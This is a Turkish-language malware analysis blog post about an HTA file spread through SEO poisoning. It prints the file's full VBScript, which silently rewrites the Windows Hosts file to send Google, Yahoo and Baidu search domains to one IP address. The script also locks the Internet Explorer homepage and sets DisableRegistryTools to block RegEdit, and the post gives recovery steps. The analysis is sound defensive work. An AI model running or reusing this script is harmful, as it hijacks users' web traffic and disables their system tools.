SEO Poisoning ve DisableRegistryTools Anahtarı

“SEO Poisoning” üzerine araştırma yaparken incelediğim sitelerden birisi üzerinden bilgisayarıma indirilen “porno-video.avi.hta” isimli dosyayı analiz ederken ilginç bir registry anahtarı dikkatimi çekti.  Bu dosya incelendiğinde anlaşılacağı üzere çalıştırıldığı Windows bilgisayardaki Hosts dosyasını açarak çoğunluğu  Google’ın olmak üzere arama sitelerine ait farklı ülke kodu uzantılı siteleri bir IP adresine eşleyecek şekilde güncelleme gerçekleştiriyor. Ardından shell.regwrite ile ilgili sisteme üç adet yeni registry değeri ekliyor.

<html><head>
<hta:application id=hta_note_id applicationName=hta_note_name showInTaskBar=no
caption=no innerBorder=no selection=no scroll=no contextmenu=no />

</script>

<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>

<SCRIPT language=vbs>
Dim fsoObject, open_File, target_File
Set fsoObject = CreateObject("Scripting.FileSystemObject")

' ### set the file name to include the variable   from the process above
target_File =   "C:\WINDOWS\system32\drivers\etc\Hosts"

If (fsoObject.FileExists(target_File)) Then
    Set open_File = fsoObject.OpenTextFile(target_File, 8 )
Else
    Set open_File = fsoObject.OpenTextFile(target_File, 2, "True")
End If

'Edit Line below with ip and hostname
open_File.WriteLine "46.45.160.179   www.google.com.tr"
open_File.WriteLine "46.45.160.179   www.google.co.uk"
open_File.WriteLine "46.45.160.179   www.google.ca"
open_File.WriteLine "46.45.160.179   www.google.com.br"
open_File.WriteLine "46.45.160.179   www.google.co.il"
open_File.WriteLine "46.45.160.179   www.google.com.ar"
open_File.WriteLine "46.45.160.179   www.google.com.my"
open_File.WriteLine "46.45.160.179   www.google.gr"
open_File.WriteLine "46.45.160.179   www.google.com.ph"
open_File.WriteLine "46.45.160.179   www.google.com.tw"
open_File.WriteLine "46.45.160.179   www.google.co.id"
open_File.WriteLine "46.45.160.179   www.google.co.in"
open_File.WriteLine "46.45.160.179   www.google.com.au"
open_File.WriteLine "46.45.160.179   www.google.ru"
open_File.WriteLine "46.45.160.179   www.google.co.nz"
open_File.WriteLine "46.45.160.179   www.google.com.pk"
open_File.WriteLine "46.45.160.179   www.google.dk"
open_File.WriteLine "46.45.160.179   www.google.pt"
open_File.WriteLine "46.45.160.179   www.google.es"
open_File.WriteLine "46.45.160.179   www.google.se"
open_File.WriteLine "46.45.160.179   www.google.de"
open_File.WriteLine "46.45.160.179   www.google.com.hk"
open_File.WriteLine "46.45.160.179   www.google.fr"
open_File.WriteLine "46.45.160.179   www.google.co.jp"
open_File.WriteLine "46.45.160.179   www.google.com.mx"
open_File.WriteLine "46.45.160.179   www.google.com.sa"
open_File.WriteLine "46.45.160.179   www.google.com.sg"
open_File.WriteLine "46.45.160.179   www.google.cn"
open_File.WriteLine "46.45.160.179   www.google.com.eg"
open_File.WriteLine "46.45.160.179   www.google.com.ba"
open_File.WriteLine "46.45.160.179   www.google.com.at"
open_File.WriteLine "46.45.160.179   www.google.be"
open_File.WriteLine "46.45.160.179   www.google.ch"
open_File.WriteLine "46.45.160.179   www.google.no"
open_File.WriteLine "46.45.160.179   www.google.sk"
open_File.WriteLine "46.45.160.179   www.google.fi"
open_File.WriteLine "46.45.160.179   search.yahoo.com"
open_File.WriteLine "46.45.160.179   www.baidu.com"
open_File.Close()

Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.aramamoturu.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
</script>
</head>
</body>
</html>

Bu registry değerleri içinde en alttaki dikkat çekici bir değer. HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ anahtarı altında yer alan DisableRegistryTools değeri ilgili sistemde registry editörünün (RegEdit) çalıştırılmasını engelleyen bir değer ve bu değer 1’e set edilmiş durumda. Eğer kullanıcı bu dosyayı çalıştırırsa bir daha RegEdit uygulamasını çalıştıramayacak demektir.  Bu durumda registry üzerinde içlem yapmak için alternatif yollara başvurmak gerekecek. Takip edilebilecek yollardan birisi  http://support.microsoft.com/kb/831787 adresindeki makalede açıklanan adımları izlemek. İkinci yol ise, eğer kullanıcı RegEdit uygulamasını çalıştıramadığını bilgisayarını yeniden başlatmadan farkederse, bu durumda  bilgisayarını yeniden başlatmalı ve  ve Windows açılış ekranından “Last Known Good Configuration” seçeneğini seçerek eski registry hive’leri ile sistemi yeniden başlatmalıdır.


Tarih: Haziran 30th, 2011 | Yazar: Halil Öztürkci | Kategori: Application Security, Genel, Malware Analiz, Security

Ara


Kategoriler


Arşiv






ADEO Security Labs
Libadiye Caddesi Tahralı Sokak Tahralı Sitesi
Kavakyeli Plaza C Blok Daire: 16-17 Ataşehir 34704 / İstanbul
+90-216-472-35-35 (Tel) | security@adeo.com.tr